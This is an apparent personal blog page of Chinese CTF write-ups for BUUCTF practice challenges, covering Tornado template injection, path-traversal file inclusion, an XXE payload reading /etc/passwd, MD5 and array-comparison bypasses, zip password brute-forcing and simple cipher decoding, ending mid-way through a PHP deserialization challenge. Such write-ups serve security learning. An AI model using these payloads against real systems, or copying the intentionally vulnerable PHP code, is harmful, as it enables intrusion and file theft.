<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="BUUCTF-WP"><meta name="keywords" content="web,misc,crypto,real,ctf,wp"><meta name="author" content="MOZac Connecter"><meta name="copyright" content="MOZac Connecter"><title>BUUCTF-WP | MOZac的小屋</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(adsbygoogle = window.adsbygoogle || []).push({
  google_ad_client: 'ca-pub-7313518215964899',
  enable_page_level_ads: 'true'
});
</script><meta name="google-site-verification" content="UA-186375523"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.3.0'
} </script><meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="MOZac的小屋" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">1.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8A%A4%E7%BD%91%E6%9D%AF-2018-easy-tornado"><span class="toc-number">1.1.</span> <span class="toc-text">[护网杯 2018]easy_tornado</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HCTF-2018-WarmUp"><span class="toc-number">1.2.</span> <span class="toc-text">[HCTF 2018]WarmUp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MISC"><span class="toc-number">2.</span> <span class="toc-text">MISC</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C%E7%BB%B4%E7%A0%81"><span class="toc-number">2.1.</span> <span class="toc-text">二维码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%87%91%E4%B8%89%E8%83%96"><span class="toc-number">2.2.</span> <span class="toc-text">金三胖</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CRYPTO"><span class="toc-number">3.</span> <span class="toc-text">CRYPTO</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MD5"><span class="toc-number">3.1.</span> <span class="toc-text">MD5</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9C%8B%E6%88%91%E5%9B%9E%E6%97%8B%E8%B8%A2"><span class="toc-number">3.2.</span> <span class="toc-text">看我回旋踢</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#URL%E7%BC%96%E7%A0%81"><span class="toc-number">3.3.</span> <span class="toc-text">URL编码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%80%E7%9C%BC%E5%B0%B1%E8%A7%A3%E5%AF%86"><span class="toc-number">3.4.</span> <span class="toc-text">一眼就解密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%91%A9%E4%B8%9D%E5%AF%86%E7%A0%81"><span class="toc-number">3.5.</span> <span class="toc-text">摩丝密码</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#REAL"><span class="toc-number">4.</span> <span class="toc-text">REAL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-XXE"><span class="toc-number">5.</span> <span class="toc-text">[PHP]XXE</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2020-09-21"><span class="toc-number"></span> <span class="toc-text">2020.09.21</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB-1"><span class="toc-number">1.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#BJDCTF2020-Easy-MD5"><span class="toc-number">1.1.</span> <span class="toc-text">[BJDCTF2020]Easy MD5</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2020-09-22"><span class="toc-number"></span> <span class="toc-text">2020.09.22</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB-2"><span class="toc-number">1.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-BuyFlag"><span class="toc-number">1.1.</span> <span class="toc-text">[极客大挑战 2019]BuyFlag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ZJCTF-2019-NiZhuanSiWei"><span class="toc-number">1.2.</span> <span class="toc-text">[ZJCTF 2019]NiZhuanSiWei</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://s3.ax1x.com/2020/12/21/r0TN5t.png"></div><div class="author-info__name text-center">MOZac Connecter</div><div class="author-info__description text-center">安全人Mozac的平凡日常</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://space.bilibili.com/13299663">关注我</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">13</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">22</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">4</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">朋友们</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.vincehut.top/">Vince迷航者</a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">MOZac的小屋</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">BUUCTF-WP</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-08-07</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E6%AF%94%E8%B5%9B/">比赛</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="护网杯-2018-easy-tornado"><a href="#护网杯-2018-easy-tornado" class="headerlink" title="[护网杯 2018]easy_tornado"></a>[护网杯 2018]easy_tornado</h3><p>打开环境<br><img src="https://img-blog.csdnimg.cn/20200315182631262.png" alt="在这里插入图片描述"><br>三个文件，点进去看看<br><img src="https://img-blog.csdnimg.cn/20200315182711730.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200315182727585.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20200315182743203.png" alt="在这里插入图片描述"><br>根据提示可以判断是通过读取<code>/fllllllllllllag</code>目录获取flag，同时这个url构成也可以看出一些东西：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//e465ff83-a405-4b2d-8536-b9afb9db504e.node3.buuoj.cn/file?filename=/flag.txt&amp;filehash=47771613f18dfe723c26c5a27b1fc4c6</span></span><br></pre></td></tr></table></figure>
<p>即是说通过传递filename关键字来读取文件目录，通过剩下的两个文件的提示可以得到payload为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">文件名&amp;（cookie_secret+文件名md5值）的md5值</span><br></pre></td></tr></table></figure>
<p>所以关键是怎么获取这个secret值，于是开始尝试<br>尝试直接访问/fllllllllllllag目录，得到如下结果<br><img src="https://img-blog.csdnimg.cn/20200315183550195.png" alt="在这里插入图片描述">看到了<code>error？msg=Error</code>，基本可以怀疑存在漏洞，更大可能性是ssti，于是尝试<br><img src="https://img-blog.csdnimg.cn/20200315183754373.png" alt="在这里插入图片描述">可以确定ssti，于是尝试构造payload<br>去官网看技术文档吧。。。<a target="_blank" rel="noopener" href="https://www.tornadoweb.org/en/stable/guide/templates.html">TORNADO官网</a><br>终点推荐去看一下Request handlers这个部分，然后是查有关<code>cookie_secret</code>的部分，可以去看一下<a target="_blank" rel="noopener" href="https://www.cnblogs.com/liyqiang/p/7140530.html">TianTianLi大佬的博客</a><br><img src="https://img-blog.csdnimg.cn/20200315185207560.png" alt="不会的东西就去学"><br>构造payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//e465ff83-a405-4b2d-8536-b9afb9db504e.node3.buuoj.cn/error?msg=&#123;&#123;handler.settings&#125;&#125;</span></span><br></pre></td></tr></table></figure>
<p>成功获取<code>cookie_secret</code>值<br><img src="https://img-blog.csdnimg.cn/20200315185714302.png" alt="在这里插入图片描述">接下来就是构造正确的请求了：（这一步我推荐手算，点名批评py3.x）<br><img src="https://img-blog.csdnimg.cn/20200315190818772.png" alt="在这里插入图片描述">done</p>
<h3 id="HCTF-2018-WarmUp"><a href="#HCTF-2018-WarmUp" class="headerlink" title="[HCTF 2018]WarmUp"></a>[HCTF 2018]WarmUp</h3><p>打开题目<br><img src="https://img-blog.csdnimg.cn/20200313193558126.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">这不是啥都没有吗…..（ctrl+u）<br><img src="https://img-blog.csdnimg.cn/20200313193657862.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">去看source.php<br><img src="https://img-blog.csdnimg.cn/20200313193738688.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">尝试连接到hint.php<br><img src="https://img-blog.csdnimg.cn/20200313193825879.png" alt="在这里插入图片描述">直接上payload：<br><img src="https://img-blog.csdnimg.cn/20200313193948238.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">OK，我的锅，用一下文件包含漏洞看一下</p>
<p>payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=hint.php%<span class="number">253</span>f/../../../../ffffllllaaaagggg</span><br></pre></td></tr></table></figure>
<p>成功</p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h3 id="二维码"><a href="#二维码" class="headerlink" title="二维码"></a>二维码</h3><p>拿到文件解压，得到一个二维码图片<br><img src="https://img-blog.csdnimg.cn/20200313203012479.png" alt="在这里插入图片描述"><br>放到网站上dcd可以得到</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">secret is here</span><br></pre></td></tr></table></figure>
<p>很明显的图片隐写，text Pad打开<br><img src="https://img-blog.csdnimg.cn/20200313203151187.png" alt="在这里插入图片描述"><br>使用<code>binwalk -e</code>在kali下分离出隐藏的文件<br><img src="https://img-blog.csdnimg.cn/20200313203247860.png" alt="在这里插入图片描述"><br>根据提示可以知道密码应该是一个四位的数字，先使用kali上的<code>fcrackzip</code>指令爆破一下<br>command如下：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fcrackzip <span class="literal">-b</span> <span class="literal">-l</span> <span class="number">4</span><span class="literal">-4</span> <span class="literal">-c</span> <span class="number">1</span> <span class="literal">-p</span> <span class="number">0000</span> /root/桌面/_QR_code.png.extracted/<span class="number">1</span>D7.zip</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200313203437471.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">所有可能的密码都在这里了，下一步就是写脚本了，毕竟手操不是常规</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">password=[<span class="string">&quot;0149&quot;</span>,<span class="string">&quot;0690&quot;</span>,<span class="string">&quot;1106&quot;</span>,<span class="string">&quot;1358&quot;</span>,<span class="string">&quot;1739&quot;</span>,<span class="string">&quot;1786&quot;</span>,<span class="string">&quot;1801&quot;</span>,<span class="string">&quot;2316&quot;</span>,<span class="string">&quot;2389&quot;</span>,<span class="string">&quot;2773&quot;</span>,<span class="string">&quot;2845&quot;</span>,<span class="string">&quot;2988&quot;</span>,<span class="string">&quot;3149&quot;</span>,<span class="string">&quot;3151&quot;</span>,<span class="string">&quot;3717&quot;</span>,<span class="string">&quot;3720&quot;</span>,<span class="string">&quot;3757&quot;</span>,<span class="string">&quot;3854&quot;</span>,<span class="string">&quot;4281&quot;</span>,<span class="string">&quot;4363&quot;</span>,<span class="string">&quot;4560&quot;</span>,<span class="string">&quot;4884&quot;</span>,<span class="string">&quot;4985&quot;</span>,<span class="string">&quot;6207&quot;</span>,<span class="string">&quot;6246&quot;</span>,<span class="string">&quot;6325&quot;</span>,<span class="string">&quot;6326&quot;</span>,<span class="string">&quot;6398&quot;</span>,<span class="string">&quot;6851&quot;</span>,<span class="string">&quot;6962&quot;</span>,<span class="string">&quot;6985&quot;</span>,<span class="string">&quot;7127&quot;</span>,<span class="string">&quot;7639&quot;</span>,<span class="string">&quot;7803&quot;</span>,<span class="string">&quot;8409&quot;</span>,<span class="string">&quot;8430&quot;</span>,<span class="string">&quot;8522&quot;</span>]</span><br><span class="line">print(<span class="string">&quot;bomb!&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> password:</span><br><span class="line">	cmd=<span class="string">&quot;unzip -c -P &quot;</span>+i+<span class="string">&quot; /root/桌面/_QR_code.png.extracted/1D7.zip&quot;</span></span><br><span class="line">	print(cmd)</span><br><span class="line">	print(os.system(cmd))</span><br><span class="line">print(<span class="string">&quot;finish!mission complete!&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>得到结果</p>
<h3 id="金三胖"><a href="#金三胖" class="headerlink" title="金三胖"></a>金三胖</h3><p>害，这就是个废题。。。<br>在这里强烈推荐在电脑上装一个爱奇艺万能播放器，直接提取gif所有帧<br><img src="https://img-blog.csdnimg.cn/20200313203842184.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">结束</p>
<h2 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a>CRYPTO</h2><h3 id="MD5"><a href="#MD5" class="headerlink" title="MD5"></a>MD5</h3><p>找个网站反解一下就很香<br><img src="https://img-blog.csdnimg.cn/20200313204529449.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h3 id="看我回旋踢"><a href="#看我回旋踢" class="headerlink" title="看我回旋踢"></a>看我回旋踢</h3><p>花里胡哨的，凯撒密码<br><img src="https://img-blog.csdnimg.cn/20200313205012768.png" alt="在这里插入图片描述"><br>位移距离13<br><img src="https://img-blog.csdnimg.cn/20200313205054558.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h3 id="URL编码"><a href="#URL编码" class="headerlink" title="URL编码"></a>URL编码</h3><p>如题</p>
<h3 id="一眼就解密"><a href="#一眼就解密" class="headerlink" title="一眼就解密"></a>一眼就解密</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ZmxhZ3tUSEVfRkxBR19PRl9USElTX1NUUklOR30=</span><br></pre></td></tr></table></figure>
<p>base64解就完事</p>
<h3 id="摩丝密码"><a href="#摩丝密码" class="headerlink" title="摩丝密码"></a>摩丝密码</h3><p>摩尔斯点码，用空格区分了</p>
<h2 id="REAL"><a href="#REAL" class="headerlink" title="REAL"></a>REAL</h2><h2 id="PHP-XXE"><a href="#PHP-XXE" class="headerlink" title="[PHP]XXE"></a>[PHP]XXE</h2><p>这绝对是今天最有意思的一道题了，因为不需要查资料了<br>打开页面：<br><img src="https://img-blog.csdnimg.cn/20200313210724883.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="开幕雷击">开局phpinfo是真的顶，翻了一遍没看出来有什么用处，但是联系题目名称的XXE，猜测可能是XXE的漏洞，构造PAYLOAD:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?</span>xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;utf-8&quot;</span><span class="meta">?&gt;</span></span><br><span class="line">&lt;!DOCTYPE xxe &#123;</span><br><span class="line">         &lt;!ELEMENT name ANY&gt;</span><br><span class="line">         &lt;!ENTITY xxe SYSTEM <span class="string">&quot;file=///etc/passwd&quot;</span>&gt;</span><br><span class="line">&gt;</span><br><span class="line">&lt;root&gt;</span><br><span class="line">        &lt;name&gt;&amp;xxe;&lt;/name&gt;</span><br><span class="line">&lt;/root&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20200313211007809.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>出结果就是雷击，但是别慌，再找找<br><img src="https://img-blog.csdnimg.cn/2020031321104057.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述">似曾相识，往下看<br><img src="https://img-blog.csdnimg.cn/20200313211107285.png" alt="在这里插入图片描述">果然</p>
<h1 id="2020-09-21"><a href="#2020-09-21" class="headerlink" title="2020.09.21"></a>2020.09.21</h1><h2 id="WEB-1"><a href="#WEB-1" class="headerlink" title="WEB"></a>WEB</h2><h3 id="BJDCTF2020-Easy-MD5"><a href="#BJDCTF2020-Easy-MD5" class="headerlink" title="[BJDCTF2020]Easy MD5"></a>[BJDCTF2020]Easy MD5</h3><p>打开页面，只有一个输入框<br><img src="https://img-blog.csdnimg.cn/20200921231831338.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>继续走，看Network：<br><img src="https://img-blog.csdnimg.cn/20200921231911103.png#pic_center" alt="在这里插入图片描述"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Hint: select * from &#39;admin&#39; where password&#x3D;md5($pass,true)</span><br></pre></td></tr></table></figure>
<p>据此判断可以用SQL的万能密码<code>&#39; or 1=1</code>，即<code>ffifdyop</code></p>
<p>下一关：<br><img src="https://img-blog.csdnimg.cn/20200921232209172.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>查看网页源码<br><img src="https://img-blog.csdnimg.cn/2020092123224937.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>这不冲？随便找两个值为0的字符串</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload: url&#x2F;?a&#x3D;s878926199a&amp;b&#x3D;s155964671a</span><br></pre></td></tr></table></figure>
<p>下一关<br><img src="https://img-blog.csdnimg.cn/20200921232437127.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>此处直接摘要<strong>颖奇L’Amore</strong>师傅的笔记：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">典型的md5 bypass，</span><br><span class="line">因为md5()或者sha1()之类的函数计算的是一个字符串的哈希值，</span><br><span class="line">对于数组则返回false，</span><br><span class="line">如果$a和$b都是数组则双双返回FALSE, 两个FALSE相等得以绕过。</span><br></pre></td></tr></table></figure>
<p>DONE</p>
<h1 id="2020-09-22"><a href="#2020-09-22" class="headerlink" title="2020.09.22"></a>2020.09.22</h1><h2 id="WEB-2"><a href="#WEB-2" class="headerlink" title="WEB"></a>WEB</h2><h3 id="极客大挑战-2019-BuyFlag"><a href="#极客大挑战-2019-BuyFlag" class="headerlink" title="[极客大挑战 2019]BuyFlag"></a>[极客大挑战 2019]BuyFlag</h3><p>打开环境</p>
<p><img src="https://img-blog.csdnimg.cn/20200923003932271.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="题目环境"><br>提示一个是用户来源问题，另外一个是需要正确的密码，查看network和网页源码</p>
<p><img src="https://img-blog.csdnimg.cn/20200923004200841.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><img src="https://img-blog.csdnimg.cn/20200923004216694.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述">猜测需要将user参数改为真，并且POST传递一个password参数</p>
<p><img src="https://img-blog.csdnimg.cn/2020092300434589.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20200923004420306.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>密码错误，猜测需要截断，于是改成<code>password=404%00</code><br><img src="https://img-blog.csdnimg.cn/20200923004539386.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L01aRVBTYW4=,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br>还是需要买？那可不行，白嫖怪什么时候真买过东西<br>判断是传递参数money，多次测试跟数组绕过strcmp有关，于是在password参数后附一个<code>money[]=a</code></p>
<p>DONE</p>
<h3 id="ZJCTF-2019-NiZhuanSiWei"><a href="#ZJCTF-2019-NiZhuanSiWei" class="headerlink" title="[ZJCTF 2019]NiZhuanSiWei"></a>[ZJCTF 2019]NiZhuanSiWei</h3><p><strong>本题考点：</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php://filter  #用于读取代码</span><br><span class="line">php://input   #用于执行代码</span><br></pre></td></tr></table></figure>
<p>打开环境即可获得源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="variable">$text</span> = <span class="variable">$_GET</span>[<span class="string">&quot;text&quot;</span>];</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];</span><br><span class="line"><span class="variable">$password</span> = <span class="variable">$_GET</span>[<span class="string">&quot;password&quot;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;welcome to the zjctf&quot;</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>).<span class="string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/flag/&quot;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Not now!&quot;</span>;</span><br><span class="line">        <span class="keyword">exit</span>(); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$file</span>);  <span class="comment">//useless.php</span></span><br><span class="line">        <span class="variable">$password</span> = unserialize(<span class="variable">$password</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$password</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>分析可知存在三个需要绕过的点</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;welcome to the zjctf&quot;</span>))</span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(preg_match(<span class="string">&quot;/flag/&quot;</span>,<span class="variable">$file</span>))&#123; </span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$password</span> = unserialize(<span class="variable">$password</span>); </span><br></pre></td></tr></table></figure>
